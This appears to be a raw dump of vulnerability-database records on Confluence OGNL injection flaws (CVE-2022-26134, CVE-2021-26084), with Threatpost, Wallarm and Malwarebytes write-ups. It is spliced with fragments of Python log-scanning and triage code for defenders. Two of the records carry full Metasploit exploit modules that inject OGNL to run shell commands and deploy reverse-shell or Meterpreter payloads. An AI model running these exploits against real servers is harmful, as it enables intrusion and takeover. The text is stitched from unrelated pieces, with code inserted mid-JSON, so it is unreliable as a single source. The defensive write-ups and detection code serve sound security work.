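# paths; the /RestAPI/Users request is a legitimate endpoint and must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2021:09:14:02 +0000] "GET /adsf/HomePage.do HTTP/1.1" 200 5120
203.0.113.7 - - [07/Sep/2021:09:15:11 +0000] "POST /RestAPI/LogonCustomization HTTP/1.1" 200 312
203.0.113.7 - - [07/Sep/2021:09:15:13 +0000] "POST /RestAPI/Connection HTTP/1.1" 200 88
10.0.0.5 - - [07/Sep/2021:09:16:40 +0000] "GET /RestAPI/Users?domain=corp HTTP/1.1" 200 944
garbage line that does not parse
"""

if __name__ == "__main__":
    result = scan_lines(SAMPLE_LOG.splitlines())
    for h in result["hits"]:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["status"]}')
    print("suspicious sources:", result["by_ip"], "unparsed lines:", result["unparsed"])
```

Run it against the real folder with `scan_log_dir(r"C:\ManageEngine\ADSelfService Plus\logs")`; a non-zero `unparsed` count with zero hits means the regex does not fit the log format, not that the instance is clean.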
**[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", 
"CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2022-06-14T17:59:22", "description": "We want to share this update regarding the critical Confluence 0-day vulnerability (CVE-2022-26134).\n\nOn June 02, 2022 Atlassian released a security advisory for its Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution ([RCE](<https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack>)) vulnerability. Exploits are already publicly available and we expect this vulnerability to be heavily exploited in the wild.\n\nWe tested Wallarm\u2019s attack detection against the known exploit and confirmed that exploitation attempts are successfully detected and blocked. No further actions are required.\n\nTo mitigate the vulnerability when working in monitoring mode, it\u2019s recommended to create a virtual patch rule based on Atlassian\u2019s recommendation for Confluence. This rule will block any request whose URI contains the string ${.\n\nYou can create the rule yourself using the example below or contact our support team if you want us to create the rule. 
The regex: [$][{]\n\nFeel free to reach out to support@wallarm.com if you need assistance.\n\nFurther updates will be published in Wallarm Changelog: <https://changelog.wallarm.com>\n\nThe post [Update on the Confluence 0-day vulnerability (CVE-2022-26134)](<https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:50:59", "type": "wallarmlab", "title": "Update on the Confluence 0-day vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T20:50:59", "id": "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681", "href": "https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:35", "description": "This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n", "cvss3": {}, "published": "2022-06-03T19:27:13", "type": "metasploit", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T21:11:56", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-26134'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n confluence_version = get_confluence_version\n return CheckCode::Unknown unless confluence_version\n\n vprint_status(\"Detected Confluence version: #{confluence_version}\")\n\n confluence_platform = get_confluence_platform\n unless confluence_platform\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n vprint_status(\"Detected target platform: #{confluence_platform}\")\n 
CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_platform\n # this method gets the platform by exploiting CVE-2022-26134\n return @confluence_platform if @confluence_platform\n\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\n \"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.System.getProperty('os.name')\")\n )\n }\n OGNL\n res = inject_ognl(ognl)\n return nil unless res\n\n res.headers[header]\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n confluence_platform = get_confluence_platform\n unless confluence_platform\n fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')\n end\n\n unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')\n fail_with(Failure::NoTarget, \"The target platform '#{confluence_platform}' is incompatible with '#{target.name}'\")\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n 
Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n res = inject_ognl(ognl, 'headers' => { header => cmd })\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(ognl, opts = {})\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')\n }.merge(opts))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:36:59", "description": "This module exploits an OGNL injection in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n", "cvss3": {}, "published": "2021-10-14T21:58:04", "type": "metasploit", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-14T21:58:04", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = 
ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Module::Deprecated\n\n # Added Windows support\n moved_from 'exploit/linux/http/atlassian_confluence_webwork_ognl_injection'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Command',\n 
{\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 
'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n #{target_shell},\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\n def target_shell\n target['Platform'] == 'win' ? '\"cmd.exe\",\"/c\"' : '\"/bin/sh\",\"-c\"'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_webwork_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-06-14T17:04:04", "description": "Microsoft has warned that "multiple adversaries and nation-state actors" are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>). It is essential users of Confluence address the patching issue immediately. 
\n\n## Confluence vulnerability: Background\n\nAt the start of June, researchers [discovered a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) in Atlassian Confluence via an incident response investigation. Confluence, a wiki-style collaboration tool, had a "critical unauthenticated remote code execution vulnerability". It affected Confluence Server and Confluence Data Center.\n\nThe attack discovered during the investigation revealed web shells deployed on the server. Web shells give an attacker persistent access to a compromised web application. The web server process and its child processes ran as root, with full privileges, so the attacker could execute commands on the host without any valid credentials.\n\nWorse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn't the kind of thing admins discovering an attack want to hear mid-investigation.\n\nUnfortunately, mitigation advice was at first limited. It ranged from restricting access to simply turning off Confluence Server and Data Center instances. On June 3, Atlassian [released](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>) versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain a fix for this vulnerability.\n\n## The current situation\n\nHere are the latest observations from Microsoft:\n\n> Multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134. 
We urge customers to upgrade to the latest version or apply recommended mitigations: <https://t.co/C3CykQgrOJ>\n> \n> -- Microsoft Security Intelligence (@MsftSecIntel) [June 11, 2022](<https://twitter.com/MsftSecIntel/status/1535417776290111489?ref_src=twsrc%5Etfw>)\n\nMicrosoft continues:\n\n> _In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware._\n\n## A mixed bag of attacks\n\nIndustrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. [AvosLocker Ransomware](<https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/>) and [Linux botnets](<https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/>) are getting in on the action. Cryptomining [jumping on the bandwagon](<https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/>) is an inevitability across most scams we see, and this is no exception.\n\nMicrosoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record [observed](<https://therecord.media/microsoft-ransomware-groups-nation-states-exploiting-atlassian-confluence-vulnerability/>) that Cerber2021 is a "relatively minor player", with both Windows and Linux versions used to lock up machines. Here's an example of the ransomware, via MalwareHunterTeam:\n\n> There is a ransomware currently active that is calling itself Cerber. \nHas Windows & Linux versions. \nLooks started to spread in the first half of November. 
IDR seen both Linux (multiple victims got git files encrypted) & Windows user victims already from different countries. \n \n [pic.twitter.com/saPGsTlDbt](<https://t.co/saPGsTlDbt>)\n> \n> -- MalwareHunterTeam (@malwrhunterteam) [December 4, 2021](<https://twitter.com/malwrhunterteam/status/1467264298237972484?ref_src=twsrc%5Etfw>)\n\nHaving the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.\n\nIf you don't want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the [Confluence Download Archives](<https://www.atlassian.com/software/confluence/download-archives>) and patch immediately.\n\nThe post ["Multiple adversaries" exploiting Confluence vulnerability, warns Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T12:43:08", "type": "malwarebytes", "title": "\u201cMultiple adversaries\u201d exploiting Confluence vulnerability, warns Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T12:43:08", "id": "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence during an incident response investigation. Atlassian rates the severity of this vulnerability as critical.\n\nAtlassian has issued a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and is working on a fix for the affected products. That makes this an actively exploited zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a wiki-style team collaboration platform that connects teams with content, knowledge and their co-workers, helping them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version, which is being phased out. 
Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. 
The web shell has two parts: the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web shell only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because the web application process had spawned a bash process, which spawned a Python process, which in turn spawned a bash shell, a parent-child chain a web server has no business producing and one worth alerting on. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process, and therefore the child processes created by the exploit, were all running as the root user and group, with full privileges. These types of vulnerabilities are dangerous, as they allow attackers to execute commands and gain full control of a vulnerable system. They can do this without valid credentials, as long as they can make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. 
Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** opens an OGNL expression, and the exploit places one in the request URI, which is why a rule on that string helps. Treat it as a stopgap, not a fix: the rule has to be applied after URL-decoding, because the characters are commonly sent percent-encoded, and it may block legitimate requests._\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: Confluence Cloud sites, which you access via an atlassian.net domain, are hosted by Atlassian and are not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). 
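Two checks that the mitigation and update advice above leaves to the reader, written here as an added example (this is not code from Malwarebytes, Volexity or Atlassian): a version classifier built from the affected ranges Atlassian published for CVE-2022-26134, and a log-side equivalent of the advisory's WAF rule that percent-decodes the request path before looking for the `${` OGNL opener, since scanners commonly send it encoded. The access-log lines, IP addresses and the `expr` placeholder path are constructed for the example and contain no payload; the fixed versions assumed are the seven listed in the June 3 update.

```python
"""Triage helpers for CVE-2022-26134 on a Confluence Server / Data Center host.

Added example; this is not code from Malwarebytes, Volexity or Atlassian.
Assumed: the fixed versions are those in Atlassian's June 3, 2022 update
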